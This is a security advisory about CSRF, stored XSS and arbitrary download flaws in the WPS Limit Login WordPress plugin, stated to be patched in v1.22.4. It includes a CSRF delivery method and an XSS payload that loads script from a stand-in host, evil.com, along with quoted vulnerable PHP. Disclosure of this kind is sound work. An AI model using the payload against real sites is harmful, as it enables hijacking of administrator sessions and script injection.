WPS Limit Login is edited by WP Serveur, WordPress french host. Criticity level for this update is medium.
CSRF #1
File : /classes/plugin.php
Line 355-358
Function count_notif()
Issue : Lack of nonce token, we can here give this link to a logged-in administrator or include it in a hidden page with POST method:
https://example.com/wp-admin/admin-ajax.php?action=count_notif with param “number” value “<script src=//evil.com/js.js></script>“.
CSRF #2
File : /classes/plugin.php
Function dismiss_admin_notice()
Issue : Lack of nonce token, we can here give this link to a logged-in administrator or include it in a hidden page with POST method:
https://example.com/wp-admin/admin-ajax.php?action=dismiss_admin_notice with param “number” and/or “option_name” and/or “dismissible_length”.
CSRF #3
File : /classes/plugin.php
Function dismiss_admin_notice()`
Issue : Lack of nonce token.
CSRF #4
File : /classes/plugin.php
Function add_option_wps_display()
Issue : Lack of nonce token.
CSRF #5
File : /classes/plugin.php
Function delete_option_wps_display()
Issue : Lack of nonce token.
CSRF #6
File : /classes/plugin.php
Function add_allow_repair_wp_config()
Issue : Lack of nonce token.
CSRF #7
File : /classes/plugin.php
Function remove_allow_repair_wp_config()
Issue : Lack of nonce token.
CSRF #8
File : /classes/plugin.php
Function wpsbidouille_rated()
Issue : Lack of nonce token.
CSRF #9
File : /classes/plugin.php
Function download_log_template_redirect()
Issue : Lack of nonce token.
CSRF #10
File : /classes/plugin.php
Function download_report_system_template_redirect()
Issue : Lack of nonce token.
CSRF #11
File : /classes/plugin.php
Function delete_unuse_plugins()
Issue : Lack of nonce token.
CSRF #12
File : /classes/plugin.php
Function delete_unuse_themes()
Issue : Lack of nonce token.
CSRF #13
File : /classes/plugin.php
Function wp_ajax_save_settings_wps()
Issue : Lack of nonce token.
CSRF #14
File : /classes/plugin.php
Function wps_get_posts()
Issue : Lack of nonce token.
CSRF #15
File : /classes/removefromcache.php
Line 432
if ( isset( $_POST['wps_cache_fields'] ) && ! wp_verify_nonce( $_POST['wps_cache_fields'], basename( __FILE__ ) ) ) {
Issue : Nonce token is not verified if we don’t send $_POST['wps_cache_fields']
The IF condition is not correct, this is:
if ( !Ā isset( $_POST['wps_cache_fields'] ) || ! wp_verify_nonce( $_POST['wps_cache_fields'], basename( __FILE__ ) ) ) {Ā
Stored XSS
File /classes/plugin.php
Line 85-88
[pastacode lang=”php” manual=”%24notifs%20%3D%20get_option(%20’wps_notifs_ajax’%20)%3B%0A%0Aif%20(%20%24notifs%20)%20%7B%0A%C2%A0%20%C2%A0%20echo%20’Vous%20avez%20’%20.%20%24notifs%20.%20’%20notifications.%3Cbr%3E%3Cbr%3E’%3B%0A%0A%7D” message=”” highlight=”” provider=”manual”/]
Issue : No escaping or cast or sanitization for the ouput, it was the same on the input. With the previous CSRF a simple subscriber can add content in the admin page like jQuery scripts etc.
Arbitrary Upload File
File /classes/suggest-plugins-themes.php
Everywhere where a nonce is checked like in this function for example:
[pastacode lang=”php” manual=”public%20static%20function%20download_plugins_premium()%20%7B%0A%0A%24download_url%20%3D%20%24_POST%5B’url’%5D%3B%0A%0Acheck_ajax_referer(%20’download-premiums’%2C%20’nonce’%20)%3B%0A%0AHelpers%3A%3Adownload_package(%20%24download_url%20)%3B%0A%0Awp_die()%3B%0A%0A%7D” message=”” highlight=”” provider=”manual”/]
We can change the URL, this will be passed in the uploader ofdownload_package(). Remark, you have to be administrator.
These vulnerabilities has been patched in v1.22.4
